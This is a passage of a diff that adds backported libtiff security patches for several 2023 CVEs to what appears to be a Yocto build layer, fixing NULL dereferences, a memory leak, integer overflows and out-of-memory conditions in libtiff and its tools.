+Date: Fri, 3 Feb 2023 17:38:55 +0100
+Subject: [PATCH] TIFFClose() avoid NULL pointer dereferencing. fix#515
+
+Closes #515
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/d63de61b1ec3385f6383ef9a1f453e4b8b11d536]
+CVE: CVE-2023-3316
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ libtiff/tif_close.c | 11 +++++++----
+ tools/tiffcrop.c | 5 ++++-
+ 2 files changed, 11 insertions(+), 5 deletions(-)
+
+diff --git a/libtiff/tif_close.c b/libtiff/tif_close.c
+index e4228df..335e80f 100644
+--- a/libtiff/tif_close.c
++++ b/libtiff/tif_close.c
+@@ -118,13 +118,16 @@ TIFFCleanup(TIFF* tif)
+ */
+
+ void
+-TIFFClose(TIFF* tif)
++TIFFClose(TIFF *tif)
+ {
+- TIFFCloseProc closeproc = tif->tif_closeproc;
+- thandle_t fd = tif->tif_clientdata;
++ if (tif != NULL)
++ {
++ TIFFCloseProc closeproc = tif->tif_closeproc;
++ thandle_t fd = tif->tif_clientdata;
+
+ TIFFCleanup(tif);
+- (void) (*closeproc)(fd);
++ (void)(*closeproc)(fd);
++ }
+ }
+
+ /* vim: set ts=8 sts=8 sw=8 noet: */
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index a533089..f14bb0c 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -2526,7 +2526,10 @@ main(int argc, char* argv[])
+ }
+ }
+
+- TIFFClose(out);
++ if (out != NULL)
++ {
++ TIFFClose(out);
++ }
+
+ return (0);
+ } /* end main */
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
new file mode 100644
index 0000000000..67837fe142
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3576.patch
@@ -0,0 +1,35 @@
+From 881a070194783561fd209b7c789a4e75566f7f37 Mon Sep 17 00:00:00 2001
+From: zhailiangliang <zhailiangliang@loongson.cn>
+Date: Tue, 7 Mar 2023 15:02:08 +0800
+Subject: [PATCH] Fix memory leak in tiffcrop.c
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/881a070194783561fd209b7c789a4e75566f7f37]
+CVE: CVE-2023-3576
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/tiffcrop.c | 7 ++++++-
+ 1 file changed, 6 insertions(+), 1 deletion(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index f14bb0c..7121c7c 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -7746,8 +7746,13 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+
+ read_buff = *read_buff_ptr;
+
++ /* Memory is freed before crop_buff_ptr is overwritten */
++ if (*crop_buff_ptr != NULL)
++ {
++ _TIFFfree(*crop_buff_ptr);
++ }
++
+ /* process full image, no crop buffer needed */
+- crop_buff = read_buff;
+ *crop_buff_ptr = read_buff;
+ crop->combined_width = image->width;
+ crop->combined_length = image->length;
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
new file mode 100644
index 0000000000..fd67305c0b
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-3618.patch
@@ -0,0 +1,47 @@
+From b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8 Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Fri, 5 May 2023 19:43:46 +0200
+Subject: [PATCH] Consider error return of writeSelections(). Fixes #553
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/b5c7d4c4e03333ac16b5cfb11acaaeaa493334f8]
+CVE: CVE-2023-3618
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcrop.c | 14 ++++++++++----
+ 1 file changed, 10 insertions(+), 4 deletions(-)
+
+diff --git a/tools/tiffcrop.c b/tools/tiffcrop.c
+index 7121c7c..93b7f96 100644
+--- a/tools/tiffcrop.c
++++ b/tools/tiffcrop.c
+@@ -2437,9 +2437,15 @@ main(int argc, char* argv[])
+ { /* Whole image or sections not based on output page size */
+ if (crop.selections > 0)
+ {
+- writeSelections(in, &out, &crop, &image, &dump, seg_buffs,
+- mp, argv[argc - 1], &next_page, total_pages);
+- }
++ if (writeSelections(in, &out, &crop, &image, &dump,
++ seg_buffs, mp, argv[argc - 1],
++ &next_page, total_pages))
++ {
++ TIFFError("main",
++ "Unable to write new image selections");
++ exit(EXIT_FAILURE);
++ }
++ }
+ else /* One file all images and sections */
+ {
+ if (update_output_file (&out, mp, crop.exp_mode, argv[argc - 1],
+@@ -7749,7 +7755,7 @@ createCroppedImage(struct image_data *image, struct crop_mask *crop,
+ /* Memory is freed before crop_buff_ptr is overwritten */
+ if (*crop_buff_ptr != NULL)
+ {
+- _TIFFfree(*crop_buff_ptr);
++ _TIFFfree(*crop_buff_ptr);
+ }
+
+ /* process full image, no crop buffer needed */
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch
new file mode 100644
index 0000000000..6eb286039f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-40745.patch
@@ -0,0 +1,34 @@
+From 4fc16f649fa2875d5c388cf2edc295510a247ee5 Mon Sep 17 00:00:00 2001
+From: Arie Haenel <arie.haenel@jct.ac.il>
+Date: Wed, 19 Jul 2023 19:34:25 +0000
+Subject: [PATCH] tiffcp: fix memory corruption (overflow) on hostile images
+ (fixes #591)
+
+Upstream-Status: Backport from [https://gitlab.com/libtiff/libtiff/-/commit/4fc16f649fa2875d5c388cf2edc295510a247ee5]
+CVE: CVE-2023-40745
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ tools/tiffcp.c | 7 +++++++
+ 1 file changed, 7 insertions(+)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 83b3910..007bd05 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -1437,6 +1437,13 @@ DECLAREreadFunc(readSeparateTilesIntoBuffer)
+ TIFFError(TIFFFileName(in), "Error, cannot handle that much samples per tile row (Tile Width * Samples/Pixel)");
+ return 0;
+ }
++
++ if ( (imagew - tilew * spp) > INT_MAX ){
++ TIFFError(TIFFFileName(in),
++ "Error, image raster scan line size is too large");
++ return 0;
++ }
++
+ iskew = imagew - tilew*spp;
+ tilebuf = _TIFFmalloc(tilesize);
+ if (tilebuf == 0)
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch
new file mode 100644
index 0000000000..3f44a42012
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-41175.patch
@@ -0,0 +1,67 @@
+From 4cc97e3dfa6559f4d17af0d0687bcae07ca4b73d Mon Sep 17 00:00:00 2001
+From: Arie Haenel <arie.haenel@jct.ac.il>
+Date: Wed, 19 Jul 2023 19:40:01 +0000
+Subject: raw2tiff: fix integer overflow and bypass of the check (fixes #592)
+
+Upstream-Status: Backport [import from debian security.debian.org/debian-security/pool/updates/main/t/tiff/tiff_4.1.0+git191117-2~deb10u8.debian.tar.xz
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/6e2dac5f904496d127c92ddc4e56eccfca25c2ee]
+CVE: CVE-2023-41175
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/raw2tiff.c | 26 ++++++++++++++++++++++++++
+ 1 file changed, 26 insertions(+)
+
+diff --git a/tools/raw2tiff.c b/tools/raw2tiff.c
+index ab36ff4e..a905da52 100644
+--- a/tools/raw2tiff.c
++++ b/tools/raw2tiff.c
+@@ -35,6 +35,7 @@
+ #include <sys/types.h>
+ #include <math.h>
+ #include <ctype.h>
++#include <limits.h>
+
+ #ifdef HAVE_UNISTD_H
+ # include <unistd.h>
+@@ -101,6 +102,7 @@ main(int argc, char* argv[])
+ int fd;
+ char *outfilename = NULL;
+ TIFF *out;
++ uint32 temp_limit_check = 0;
+
+ uint32 row, col, band;
+ int c;
+@@ -212,6 +214,30 @@ main(int argc, char* argv[])
+ if (guessSize(fd, dtype, hdr_size, nbands, swab, &width, &length) < 0)
+ return 1;
+
++ if ((width == 0) || (length == 0) ){
++ fprintf(stderr, "Too large nbands value specified.\n");
++ return (EXIT_FAILURE);
++ }
++
++ temp_limit_check = nbands * depth;
++
++ if ( !temp_limit_check || length > ( UINT_MAX / temp_limit_check ) ) {
++ fprintf(stderr, "Too large length size specified.\n");
++ return (EXIT_FAILURE);
++ }
++ temp_limit_check = temp_limit_check * length;
++
++ if ( !temp_limit_check || width > ( UINT_MAX / temp_limit_check ) ) {
++ fprintf(stderr, "Too large width size specified.\n");
++ return (EXIT_FAILURE);
++ }
++ temp_limit_check = temp_limit_check * width;
++
++ if ( !temp_limit_check || hdr_size > ( UINT_MAX - temp_limit_check ) ) {
++ fprintf(stderr, "Too large header size specified.\n");
++ return (EXIT_FAILURE);
++ }
++
+ if (outfilename == NULL)
+ outfilename = argv[optind+1];
+ out = TIFFOpen(outfilename, "w");
+--
+2.30.2
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch
new file mode 100644
index 0000000000..1b651e6529
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-52356.patch
@@ -0,0 +1,53 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFErrorExt instead of TIFFErrorExtR (the latter did not exist yet);
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 51558511bdbbcffdce534db21dbaf5d54b31638a Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 15:58:41 +0100
+Subject: [PATCH] TIFFReadRGBAStrip/TIFFReadRGBATile: add more validation of
+ col/row (fixes #622)
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-52356.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/51558511bdbbcffdce534db21dbaf5d54b31638a]
+CVE: CVE-2023-52356
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_getimage.c | 15 +++++++++++++++
+ 1 file changed, 15 insertions(+)
+
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_getimage.c
++++ tiff-4.1.0+git191117/libtiff/tif_getimage.c
+@@ -2926,6 +2926,13 @@ TIFFReadRGBAStripExt(TIFF* tif, uint32 r
+ }
+
+ if (TIFFRGBAImageOK(tif, emsg) && TIFFRGBAImageBegin(&img, tif, stop_on_error, emsg)) {
++ if (row >= img.height)
++ {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
++ "Invalid row passed to TIFFReadRGBAStrip().");
++ TIFFRGBAImageEnd(&img);
++ return (0);
++ }
+
+ img.row_offset = row;
+ img.col_offset = 0;
+@@ -3002,6 +3009,14 @@ TIFFReadRGBATileExt(TIFF* tif, uint32 co
+ return( 0 );
+ }
+
++ if (col >= img.width || row >= img.height)
++ {
++ TIFFErrorExt(tif->tif_clientdata, TIFFFileName(tif),
++ "Invalid row/col passed to TIFFReadRGBATile().");
++ TIFFRGBAImageEnd(&img);
++ return (0);
++ }
++
+ /*
+ * The TIFFRGBAImageGet() function doesn't allow us to get off the
+ * edge of the image, even to fill an otherwise valid tile. So we
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch
new file mode 100644
index 0000000000..a777dea9b0
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6228.patch
@@ -0,0 +1,30 @@
+From 1e7d217a323eac701b134afc4ae39b6bdfdbc96a Mon Sep 17 00:00:00 2001
+From: Su_Laus <sulau@freenet.de>
+Date: Sat, 9 Sep 2023 15:45:47 +0200
+Subject: [PATCH] Check also if codec of input image is available,
+ independently from codec check of output image and return with error if not.
+ Fixes #606.
+
+Upstream-Status: Backport [https://gitlab.com/libtiff/libtiff/-/commit/1e7d217a323eac701b134afc4ae39b6bdfdbc96a]
+CVE: CVE-2023-6228
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ tools/tiffcp.c | 2 ++
+ 1 file changed, 2 insertions(+)
+
+diff --git a/tools/tiffcp.c b/tools/tiffcp.c
+index 007bd05..d2f7b66 100644
+--- a/tools/tiffcp.c
++++ b/tools/tiffcp.c
+@@ -628,6 +628,8 @@ tiffcp(TIFF* in, TIFF* out)
+ else
+ CopyField(TIFFTAG_COMPRESSION, compression);
+ TIFFGetFieldDefaulted(in, TIFFTAG_COMPRESSION, &input_compression);
++ if (!TIFFIsCODECConfigured(input_compression))
++ return FALSE;
+ TIFFGetFieldDefaulted(in, TIFFTAG_PHOTOMETRIC, &input_photometric);
+ if (input_compression == COMPRESSION_JPEG) {
+ /* Force conversion to RGB */
+--
+2.25.1
+
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch
new file mode 100644
index 0000000000..e955b3f2e4
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-1.patch
@@ -0,0 +1,191 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . included inttypes.h header to support PRIu32 and PRIu64;
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+ . calling _TIFFfree(data) instead of _TIFFfreeExt(tif, data) (the latter did not exist yet);
+ . calls to the check size, that is the idea of the patch, were added before
+ _TIFFCheckMalloc and may note match the original patch methods;
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 5320c9d89c054fa805d037d84c57da874470b01a Mon Sep 17 00:00:00 2001
+From: Su Laus <sulau@freenet.de>
+Date: Tue, 31 Oct 2023 15:43:29 +0000
+Subject: [PATCH] Prevent some out-of-memory attacks
+
+Some small fuzzer files fake large amounts of data and provoke out-of-memory situations. For non-compressed data content / tags, out-of-memory can be prevented by comparing with the file size.
+
+At image reading, data size of some tags / data structures (StripByteCounts, StripOffsets, StripArray, TIFF directory) is compared with file size to prevent provoked out-of-memory attacks.
+
+See issue https://gitlab.com/libtiff/libtiff/-/issues/614#note_1602683857
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-1.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/5320c9d89c054fa805d037d84c57da874470b01a]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 92 ++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 90 insertions(+), 2 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -37,6 +37,7 @@
+ #include "tiffiop.h"
+ #include <float.h>
+ #include <stdlib.h>
++#include <inttypes.h>
+
+ #define FAILED_FII ((uint32) -1)
+
+@@ -863,6 +864,21 @@ static enum TIFFReadDirEntryErr TIFFRead
+ datasize=(*count)*typesize;
+ assert((tmsize_t)datasize>0);
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of requested memory is not greater than file size.
++ */
++ uint64 filesize = TIFFGetFileSize(tif);
++ if (datasize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
++ "Requested memory size for tag %d (0x%x) %" PRIu32
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, tag not read",
++ direntry->tdir_tag, direntry->tdir_tag, datasize,
++ filesize);
++ return (TIFFReadDirEntryErrAlloc);
++ }
++
+ if( isMapped(tif) && datasize > (uint32)tif->tif_size )
+ return TIFFReadDirEntryErrIo;
+
+@@ -4534,6 +4550,20 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ if( !_TIFFFillStrilesInternal( tif, 0 ) )
+ return -1;
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Requested memory size for StripByteCounts of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return -1;
++ }
++
+ if (td->td_stripbytecount_p)
+ _TIFFfree(td->td_stripbytecount_p);
+ td->td_stripbytecount_p = (uint64*)
+@@ -4544,9 +4574,7 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+
+ if (td->td_compression != COMPRESSION_NONE) {
+ uint64 space;
+- uint64 filesize;
+ uint16 n;
+- filesize = TIFFGetFileSize(tif);
+ if (!(tif->tif_flags&TIFF_BIGTIFF))
+ space=sizeof(TIFFHeaderClassic)+2+dircount*12+4;
+ else
+@@ -4854,6 +4882,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");
+ if (origdir == NULL)
+@@ -4957,6 +4999,20 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ "Sanity check on directory count failed, zero tag directories not supported");
+ return 0;
+ }
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize,
+ "to read TIFF directory");
+@@ -5000,6 +5056,8 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ }
+ }
+ }
++ /* No check against filesize needed here because "dir" should have same size
++ * than "origdir" checked above. */
+ dir = (TIFFDirEntry*)_TIFFCheckMalloc(tif, dircount16,
+ sizeof(TIFFDirEntry),
+ "to read TIFF directory");
+@@ -5769,7 +5827,20 @@ TIFFFetchStripThing(TIFF* tif, TIFFDirEn
+ _TIFFfree(data);
+ return(0);
+ }
+-
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ uint64 filesize = TIFFGetFileSize(tif);
++ uint64 allocsize = (uint64)nstrips * sizeof(uint64);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, module,
++ "Requested memory size for StripArray of %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ _TIFFfree(data);
++ return (0);
++ }
+ resizeddata=(uint64*)_TIFFCheckMalloc(tif,nstrips,sizeof(uint64),"for strip array");
+ if (resizeddata==0) {
+ _TIFFfree(data);
+@@ -5865,6 +5936,23 @@ static void allocChoppedUpStripArrays(TI
+ }
+ bytecount = last_offset + last_bytecount - offset;
+
++ /* Before allocating a huge amount of memory for corrupted files, check if
++ * size of StripByteCount and StripOffset tags is not greater than
++ * file size.
++ */
++ uint64 allocsize = (uint64)nstrips * sizeof(uint64) * 2;
++ uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "allocChoppedUpStripArrays",
++ "Requested memory size for StripByteCount and "
++ "StripOffsets %" PRIu64
++ " is greather than filesize %" PRIu64
++ ". Memory not allocated",
++ allocsize, filesize);
++ return;
++ }
++
+ newcounts = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
+ "for chopped \"StripByteCounts\" array");
+ newoffsets = (uint64*) _TIFFCheckMalloc(tif, nstrips, sizeof (uint64),
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch
new file mode 100644
index 0000000000..644b3fdb3f
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-2.patch
@@ -0,0 +1,152 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
+-- Rodrigo Figueiredo Zaiden]
+
+Backport of:
+
+From 0b025324711213a75e38b52f7e7ba60235f108aa Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 19:47:22 +0100
+Subject: [PATCH] tif_dirread.c: only issue TIFFGetFileSize() for large enough
+ RAM requests
+
+Ammends 5320c9d89c054fa805d037d84c57da874470b01a
+
+This fixes a performance regression caught by the GDAL regression test
+suite.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-2.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/0b025324711213a75e38b52f7e7ba60235f108aa]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 83 +++++++++++++++++++++++++------------------
+ 1 file changed, 48 insertions(+), 35 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -864,19 +864,22 @@ static enum TIFFReadDirEntryErr TIFFRead
+ datasize=(*count)*typesize;
+ assert((tmsize_t)datasize>0);
+
+- /* Before allocating a huge amount of memory for corrupted files, check if
+- * size of requested memory is not greater than file size.
+- */
+- uint64 filesize = TIFFGetFileSize(tif);
+- if (datasize > filesize)
++ if (datasize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
+- "Requested memory size for tag %d (0x%x) %" PRIu32
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated, tag not read",
+- direntry->tdir_tag, direntry->tdir_tag, datasize,
+- filesize);
+- return (TIFFReadDirEntryErrAlloc);
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (datasize > filesize)
++ {
++ TIFFWarningExt(tif->tif_clientdata, "ReadDirEntryArray",
++ "Requested memory size for tag %d (0x%x) %" PRIu32
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated, tag not read",
++ direntry->tdir_tag, direntry->tdir_tag, datasize,
++ filesize);
++ return (TIFFReadDirEntryErrAlloc);
++ }
+ }
+
+ if( isMapped(tif) && datasize > (uint32)tif->tif_size )
+@@ -4550,18 +4553,22 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ if( !_TIFFFillStrilesInternal( tif, 0 ) )
+ return -1;
+
+- /* Before allocating a huge amount of memory for corrupted files, check if
+- * size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)td->td_nstrips * sizeof(uint64);
++ uint64 filesize = 0;
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(tif->tif_clientdata, module,
+- "Requested memory size for StripByteCounts of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated",
+- allocsize, filesize);
+- return -1;
++ /* Before allocating a huge amount of memory for corrupted files, check
++ * if size of requested memory is not greater than file size. */
++ filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for StripByteCounts of %" PRIu64
++ " is greater than filesize %" PRIu64 ". Memory not allocated",
++ allocsize, filesize);
++ return -1;
++ }
+ }
+
+ if (td->td_stripbytecount_p)
+@@ -4608,11 +4615,13 @@ EstimateStripByteCounts(TIFF* tif, TIFFD
+ return -1;
+ space+=datasize;
+ }
++ if (filesize == 0)
++ filesize = TIFFGetFileSize(tif);
+ if( filesize < space )
+- /* we should perhaps return in error ? */
+- space = filesize;
+- else
+- space = filesize - space;
++ /* we should perhaps return in error ? */
++ space = filesize;
++ else
++ space = filesize - space;
+ if (td->td_planarconfig == PLANARCONFIG_SEPARATE)
+ space /= td->td_samplesperpixel;
+ for (strip = 0; strip < td->td_nstrips; strip++)
+@@ -4882,19 +4891,23 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
+- /* Before allocating a huge amount of memory for corrupted files, check
+- * if size of requested memory is not greater than file size. */
+- uint64 filesize = TIFFGetFileSize(tif);
+- uint64 allocsize = (uint64)dircount16 * dirsize;
+- if (allocsize > filesize)
++ const uint64 allocsize = (uint64)dircount16 * dirsize;
++ if (allocsize > 100 * 1024 * 1024)
+ {
+- TIFFWarningExt(
+- tif->tif_clientdata, module,
+- "Requested memory size for TIFF directory of %" PRIu64
+- " is greather than filesize %" PRIu64
+- ". Memory not allocated, TIFF directory not read",
+- allocsize, filesize);
+- return 0;
++ /* Before allocating a huge amount of memory for corrupted files,
++ * check if size of requested memory is not greater than file size.
++ */
++ const uint64 filesize = TIFFGetFileSize(tif);
++ if (allocsize > filesize)
++ {
++ TIFFWarningExt(
++ tif->tif_clientdata, module,
++ "Requested memory size for TIFF directory of %" PRIu64
++ " is greater than filesize %" PRIu64
++ ". Memory not allocated, TIFF directory not read",
++ allocsize, filesize);
++ return 0;
++ }
+ }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch
new file mode 100644
index 0000000000..ed7d7e7b96
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-3.patch
@@ -0,0 +1,46 @@
+Backport of:
+
+From de7bfd7d4377c266f81849579f696fa1ad5ba6c3 Mon Sep 17 00:00:00 2001
+From: Even Rouault <even.rouault@spatialys.com>
+Date: Tue, 31 Oct 2023 20:13:45 +0100
+Subject: [PATCH] TIFFFetchDirectory(): remove useless allocsize vs filesize
+ check
+
+CoverityScan rightly points that the max value for dircount16 * dirsize
+is 4096 * 20. That's small enough not to do any check
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/tiff/tree/debian/patches/CVE-2023-6277-3.patch?h=ubuntu/focal-security
+Upstream commit https://gitlab.com/libtiff/libtiff/-/commit/de7bfd7d4377c266f81849579f696fa1ad5ba6c3]
+CVE: CVE-2023-6277
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ libtiff/tif_dirread.c | 18 ------------------
+ 1 file changed, 18 deletions(-)
+
+--- tiff-4.1.0+git191117.orig/libtiff/tif_dirread.c
++++ tiff-4.1.0+git191117/libtiff/tif_dirread.c
+@@ -4891,24 +4891,6 @@ TIFFFetchDirectory(TIFF* tif, uint64 dir
+ dircount16 = (uint16)dircount64;
+ dirsize = 20;
+ }
+- const uint64 allocsize = (uint64)dircount16 * dirsize;
+- if (allocsize > 100 * 1024 * 1024)
+- {
+- /* Before allocating a huge amount of memory for corrupted files,
+- * check if size of requested memory is not greater than file size.
+- */
+- const uint64 filesize = TIFFGetFileSize(tif);
+- if (allocsize > filesize)
+- {
+- TIFFWarningExt(
+- tif->tif_clientdata, module,
+- "Requested memory size for TIFF directory of %" PRIu64
+- " is greater than filesize %" PRIu64
+- ". Memory not allocated, TIFF directory not read",
+- allocsize, filesize);
+- return 0;
+- }
+- }
+ origdir = _TIFFCheckMalloc(tif, dircount16,
+ dirsize, "to read TIFF directory");
+ if (origdir == NULL)
diff --git a/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch
new file mode 100644
index 0000000000..1a43fd3230
--- /dev/null
+++ b/meta/recipes-multimedia/libtiff/files/CVE-2023-6277-4.patch
@@ -0,0 +1,94 @@
+[Ubuntu note: Backport of the following patch from upstream, with a few changes
+to match the current version of the file in the present Ubuntu release:
+ . using TIFFWarningExt instead of TIFFWarningExtR (the latter did not exist yet);
+ . using uint64 instead of uint64_t to preserve the current code usage;
